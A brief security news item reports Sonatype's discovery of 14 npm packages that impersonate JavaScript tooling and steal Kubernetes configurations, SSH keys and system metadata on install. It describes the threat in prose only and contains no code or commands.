"Fresh Wave of Malicious npm Packages Threaten Kubernetes Configs and SSH Keys"

Researchers have discovered a new set of malicious packages in the npm package registry designed to exfiltrate Kubernetes configurations and SSH keys from compromised machines to a remote server. Sonatype reported discovering 14 different npm packages that impersonate JavaScript libraries and components, such as ESLint plugins and TypeScript SDK tools. Multiple versions of the packages were observed executing obfuscated code to collect and extract sensitive files from the target system upon installation. In addition to Kubernetes configurations and SSH keys, the modules can collect system metadata, including username, IP address, and hostname. The disclosure follows Sonatype's detection of counterfeit npm packages that use a technique known as dependency confusion to impersonate internal packages used by PayPal Zettle and Airbnb developers as part of an ethical research experiment. This article continues to discuss the new batch of malicious packages in the npm package registry aimed at exfiltrating Kubernetes configurations and SSH keys from compromised machines to a remote server.

THN reports "Fresh Wave of Malicious npm Packages Threaten Kubernetes Configs and SSH Keys"